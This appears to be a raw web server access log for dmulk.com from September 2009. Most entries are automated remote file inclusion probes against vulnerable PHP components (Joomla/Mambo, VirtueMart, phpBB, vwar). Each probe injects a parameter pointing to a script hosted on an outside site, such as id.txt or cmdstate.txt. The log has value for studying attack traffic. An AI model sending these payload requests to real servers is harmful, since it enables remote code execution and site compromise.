211.204.148.251 - - [07/Sep/2009:09:00:02 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:09:00:04 -0700] "GET /logs/access_080410.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.110.59.2 - - [07/Sep/2009:09:00:04 -0700] "GET /logs/access_090817.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.204.148.251 - - [07/Sep/2009:09:00:07 -0700] "GET /logs/access_080808.log/SQuery/lib/gore.php?libpath=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:27 -0700] "GET /logs/access_080429.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:27 -0700] "GET /logs/access_090519.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:34 -0700] "GET /logs/access_080123.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:44 -0700] "GET /logs/access_090703.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:44 -0700] "GET /logs/access_080827.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:45 -0700] "GET /logs/access_090515.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:49 -0700] "GET /logs/access_090121.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:50 -0700] "GET /logs/access_090426.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:54 -0700] "GET /logs/access_080524.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:54 -0700] "GET /logs/access_090411.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:54 -0700] "GET /logs/access_090119.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:56 -0700] "GET /logs/access_080411.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:00:59 -0700] "GET /logs/access_080630.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:01:30 -0700] "GET /logs/access_090131.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:01:36 -0700] "GET /logs/access_080306.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
199.96.29.70 - - [07/Sep/2009:09:01:41 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:01:42 -0700] "GET /logs/access_090210.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:01:42 -0700] "GET /logs/access_080124.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:01:50 -0700] "GET /logs/access_081107.log%20//s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:01:50 -0700] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:01:50 -0700] "GET /s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:01:52 -0700] "GET /logs/access_080115.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:01:54 -0700] "GET /logs/access_090120.log%20//s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:07 -0700] "GET /logs/access_090615.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:09:02:10 -0700] "GET /logs/access_090201.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [07/Sep/2009:09:02:11 -0700] "GET /logs/access_090201.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:09:02:15 -0700] "GET /blog/wp-content/gallery/2008-yuma/005.jpg HTTP/1.1" 200 461532 "-" "Googlebot-Image/1.0" "dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:16 -0700] "GET /logs/access_081006.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:17 -0700] "GET /include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:17 -0700] "GET /logs/access_090326.log%20//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:17 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:23 -0700] "GET /logs/access_090326.log%20//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:23 -0700] "GET /include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.168.84 - - [07/Sep/2009:09:02:23 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.nsau.edu.ru//cms/administrator/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:30 -0700] "GET /logs/access_080424.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.169.210.130 - - [07/Sep/2009:09:02:30 -0700] "GET /errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.169.210.130 - - [07/Sep/2009:09:02:30 -0700] "GET /logs/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.169.210.130 - - [07/Sep/2009:09:02:30 -0700] "GET /logs/access_090223.log/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:30 -0700] "GET /logs/access_080804.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:30 -0700] "GET /logs/access_080224.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.150.247.202 - - [07/Sep/2009:09:02:33 -0700] "GET /logs/access_081221.log%20%20//myevent.php?myevent_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/access_080913.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/access_080913.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/access_080913.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /logs/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:34 -0700] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:48 -0700] "GET /logs/access_090710.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:49 -0700] "GET /logs/access_090710.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:09:02:55 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
211.43.202.66 - - [07/Sep/2009:09:02:55 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
79.174.78.83 - - [07/Sep/2009:09:02:56 -0700] "GET /logs/access_090710.log%20%20/modules/mod_mainmenu.php?mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:02:59 -0700] "GET /s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:02:59 -0700] "GET /logs/access_081107.log//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:02:59 -0700] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:03:04 -0700] "GET /logs/access_081107.log//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:03:04 -0700] "GET /s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:03:04 -0700] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:03:04 -0700] "GET /logs/access_090123.log//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:03:10 -0700] "GET /logs/access_090123.log//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:03:36 -0700] "GET /logs/access_080906.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.216.6 - - [07/Sep/2009:09:03:37 -0700] "GET /logs/access_090703.log//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:03:37 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:03:37 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:03:52 -0700] "GET /logs/access_081203.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.204.148.251 - - [07/Sep/2009:09:04:08 -0700] "GET /logs/access_081007.log/SQuery/lib/gore.php?libpath=http://www.agapechapel.net/bbs/bjork/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:09:04:16 -0700] "GET /logs/access_090122.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.218 - - [07/Sep/2009:09:04:30 -0700] "GET /logs/access_080412.log HTTP/1.0" 200 1731361 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.68.229 - - [07/Sep/2009:09:04:49 -0700] "GET /blog/wp-content/gallery/2008-decstmaint/007.jpg HTTP/1.1" 200 354943 "-" "Googlebot-Image/1.0" "dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:05:07 -0700] "GET /logs/access_090523.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:05:10 -0700] "GET /logs/access_080322.log//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:05:11 -0700] "GET /logs/access_090309.log HTTP/1.0" 200 131072 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:05:11 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:05:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.96.29.70 - - [07/Sep/2009:09:05:32 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://indo.home.ro/idbit??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:09:05:53 -0700] "GET /logs/access_081030.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:45 -0700] "GET /logs/access_080708.log%20%20//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:45 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:45 -0700] "GET /codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:47 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:47 -0700] "GET /logs/access_080708.log%20%20//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:47 -0700] "GET /codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:51 -0700] "GET /logs/access_080716.log%20%20//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.245.197.222 - - [07/Sep/2009:09:06:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; AskTB5.4)" "dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:06:51 -0700] "GET /logs/access_080716.log%20%20//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:06:55 -0700] "GET /logs/access_081107.log%20//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:07:00 -0700] "GET /logs/access_090120.log%20//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:07:52 -0700] "GET /logs/access_090123.log//s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:07:54 -0700] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:07:55 -0700] "GET /logs/access_080601.log//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.236.249 - - [07/Sep/2009:09:08:00 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:08:01 -0700] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.236.249 - - [07/Sep/2009:09:08:02 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.29.82.154 - - [07/Sep/2009:09:08:04 -0700] "GET /logs/access_080904.log//s_common.inc.php?DOCUMENT_ROOT=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:08:17 -0700] "GET /logs/access_081107.log%20//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.244.236.249 - - [07/Sep/2009:09:08:19 -0700] "GET /logs/access_090408.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://mp30u.com/bbs/skin/zer014/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:09:08:20 -0700] "GET /logs/access_090120.log%20//s_common.inc.php?DOCUMENT_ROOT=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.143.140 - - [07/Sep/2009:09:08:27 -0700] "GET /logs/access_080623.log/errors.php?error=http://maderasglob.no.comunidades.net/cmdstate.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:09:08:32 -0700] "GET /logs/access_080929.log//modules/vwar/admin/admin.php?vwar_root=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:08:35 -0700] "GET /logs/access_080708.log//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:08:35 -0700] "GET /logs/access_080716.log//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:08:36 -0700] "GET /logs/access_080708.log//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.50.85.104 - - [07/Sep/2009:09:08:36 -0700] "GET /logs/access_080716.log//codebb/lang_select?phpbb_root_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:09:08:40 -0700] "GET /codebb/lang_select?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:09:08:40 -0700] "GET /logs//codebb/lang_select?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:09:08:40 -0700] "GET /logs/access_080708.log%20%20//codebb/lang_select?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:09:08:43 -0700] "GET /codebb/lang_select?phpbb_root_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
